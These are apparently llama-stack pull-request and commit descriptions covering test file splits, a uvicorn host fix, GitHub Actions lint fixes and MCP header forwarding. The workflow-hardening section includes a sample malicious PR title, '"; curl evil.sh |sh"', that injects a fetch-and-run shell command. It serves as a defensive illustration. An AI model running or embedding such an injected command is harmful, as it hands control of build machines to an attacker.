| `tests/unit/.../vertexai/test_converters.py` | 1368 | `test_converters_requests.py` (724L), `test_converters_responses.py` (613L), `test_converters_completions.py` (330L) |
| `tests/unit/.../vector_io/test_vector_io_openai_vector_stores.py` | 1571 | `test_vector_io_stores_index.py` (422L), `..._files.py` (215L), `..._batches.py` (702L), `..._config.py` (385L) |

## Test Plan

~~~bash
# vertexai adapter tests (96 pass)
uv run pytest tests/unit/providers/inference/vertexai/test_adapter_core.py \
  tests/unit/providers/inference/vertexai/test_adapter_chat.py \
  tests/unit/providers/inference/vertexai/test_adapter_params.py -v

# vertexai converter tests (118 pass)
uv run pytest tests/unit/providers/inference/vertexai/test_converters_requests.py \
  tests/unit/providers/inference/vertexai/test_converters_responses.py \
  tests/unit/providers/inference/vertexai/test_converters_completions.py -v

# vector_io tests (92 pass)
uv run pytest tests/unit/providers/vector_io/test_vector_io_stores_index.py \
  tests/unit/providers/vector_io/test_vector_io_stores_files.py \
  tests/unit/providers/vector_io/test_vector_io_stores_batches.py \
  tests/unit/providers/vector_io/test_vector_io_stores_config.py -v

# import verification
uv run python -c "from llama_stack.models.llama.sku_list import resolve_model, all_registered_models; print(len(all_registered_models()), 'models')"
uv run python -c "from scripts.openapi_generator import schema_transforms; assert hasattr(schema_transforms, '_write_yaml_file')"
~~~

No breaking changes. All public imports preserved via re-exports.

---------

Signed-off-by: Sumanth Kamenani <skamenan@redhat.com>
Signed-off-by: skamenan7 <skamenan@redhat.com>
Signed-off-by: Sébastien Han <seb@redhat.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Force-pushed 7f6d945 to 7876559
…ck#5284)

The default host was incorrectly set to a list, `["::", "0.0.0.0"]`, which caused uvicorn to crash with `workers > 1`; uvicorn expects the host parameter to be a string, not a list.

Changed the default host to `"::"`, which enables dual-stack binding on modern Linux systems, accepting both IPv4 and IPv6 connections. Added error handling for IPv4-only systems with a helpful message directing users to set `server.host: "0.0.0.0"` in their config.

Fixes: llamastack#5283

Signed-off-by: Derek Higgins <derekh@redhat.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
Force-pushed 7876559 to fde93fc
## Summary
- Add actionlint as a pre-commit hook to lint GitHub Actions workflows
(runs via existing pre-commit CI workflow)
- Fix all actionlint and shellcheck violations across 16 workflow files,
including:
- Untrusted input injection risks (pass `github.event.*` through `env:`
instead of inline `${{ }}`)
- Always-true `if:` condition from redundant `${{ }}` wrapper
- Unquoted variables and command substitutions (SC2086, SC2046)
- `ls` replaced with `find` for robustness (SC2012)
- Grouped consecutive redirects (SC2129)
- Removed unused variables (SC2034)
- Replaced `sed` with parameter expansion where equivalent (SC2001)
- Fixed string vs integer comparison (SC2170)
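The untrusted-input fix in the first bullet follows the standard env-indirection pattern; a minimal sketch, with the step name and variable name being illustrative rather than taken from these workflows:

```yaml
# Before: inline expansion lets attacker-controlled text become shell syntax
#   run: echo "PR title: ${{ github.event.pull_request.title }}"
# After: route the value through env so the shell only sees a quoted variable
- name: Print PR title safely
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "PR title: $PR_TITLE"
```

Because `env:` values are passed to the process environment rather than interpolated into the script text, a malicious title like `"; curl evil.sh |sh"` stays inert data.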
## Approach
Each lint rule is enabled in a separate commit for easier review — first
commit disables all failing checks, then each subsequent commit enables
one rule and fixes all its violations.
## Test plan
- [x] `uv run pre-commit run actionlint --all-files` passes with zero
violations
- [ ] CI workflows behave identically (all changes are style/safety
fixes with no behavioral changes)
---------
Signed-off-by: Eoin Fennessy <efenness@redhat.com>
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
Force-pushed fde93fc to cd9ac53
Adds `forward_headers` and `extra_blocked_headers` to `MCPProviderConfig`, wiring per-request header forwarding into `list_runtime_tools` and `invoke_tool`. This lets deployers map keys from `X-LlamaStack-Provider-Data` to outbound HTTP headers so request-scoped auth tokens (MaaS API keys, tenant IDs, etc.) reach the downstream MCP server without the caller passing them via `authorization=` on every tool call.

Follows the same `forward_headers` pattern introduced for inference and safety passthrough in llamastack#5134. Authorization-mapped values are split out and passed via the `authorization=` param — `prepare_mcp_headers()` rejects `Authorization` in the headers dict directly, so it flows through the dedicated param instead.

## What changed
- `MCPProviderConfig`: added `forward_headers: dict[str, str] | None` and `extra_blocked_headers: list[str]` with config-time validation via `validate_forward_headers_config()` from `providers/utils/forward_headers.py`
- `MCPProviderDataValidator`: added `model_config = ConfigDict(extra="allow")` so deployer-defined keys survive Pydantic parsing (key names are operator-configured at deploy time and can't be declared as typed fields)
- `ModelContextProtocolImpl`: new `_get_forwarded_headers_and_auth()` reads the allowlist from provider data, splits Authorization for the `authorization=` param, and returns non-auth headers separately. Both `list_runtime_tools` and `invoke_tool` merge forwarded headers with the legacy `mcp_headers` URI-keyed path (kept for backward compat). Explicit `authorization=` from the caller wins over forwarded auth.

Config example:
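A minimal sketch of what such a config could look like; the provider-data key names (`maas_api_token`, `tenant_id`) match those used in the test plan below, `x-internal-debug` is a hypothetical blocked header, and exact placement within a run config may differ:

```yaml
tool_runtime:
  - provider_id: model-context-protocol
    provider_type: remote::model-context-protocol
    config:
      # provider-data key -> outbound HTTP header (default-deny allowlist)
      forward_headers:
        maas_api_token: Authorization   # split out and sent via authorization=
        tenant_id: X-Tenant-ID
      # extra header names to block on top of the built-in blocklist
      extra_blocked_headers:
        - x-internal-debug
```

Keys not listed under `forward_headers` are never forwarded, so adding a new provider-data field is safe by default.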
## Test plan
**Unit/integration tests** — tests covering config validation, header forwarding, auth splitting, default-deny enforcement, missing-key soft-skip, and wiring through `list_runtime_tools` and `invoke_tool`.

**Local testing with mock MCP server** — ran a mock MCP server that captures all inbound headers and exposes them at `/debug/last-headers`. Started llama-stack with the `forward_headers` config above, then verified via the agent API that:

- `maas_api_token` from `X-LlamaStack-Provider-Data` arrived as `Authorization: Bearer <token>` on the downstream server
- `tenant_id` arrived as `X-Tenant-ID`
- an unlisted key (`secret_internal`) did not appear in any downstream header (default-deny confirmed)

Note: `invoke_tool` and `list_runtime_tools` are internal methods called by the agents layer and not exposed as HTTP endpoints (changed in upstream PRs llamastack#4997 and llamastack#5246), so full e2e requires a model server via the agent API.

## Checklist

- `forward_headers`/`extra_blocked_headers` optional with backward-compatible defaults — configs without them parse correctly
- Covered `None`, empty dict, and populated dict cases
- `MCPProviderDataValidator` uses `extra="allow"` (intentional — deployer key names can't be pre-declared)
- `MCPProviderConfig` uses `extra="forbid"`
- Reuses `build_forwarded_headers()` and `validate_forward_headers_config()` from `providers/utils/forward_headers.py` — no duplication
- Legacy `mcp_headers` URI-keyed path preserved for backward compat

## Summary by Sourcery
Add configurable per-request header forwarding support to remote passthrough providers, including MCP tool runtime, inference, and safety, using a shared forward_headers utility with stricter validation and default-deny behavior.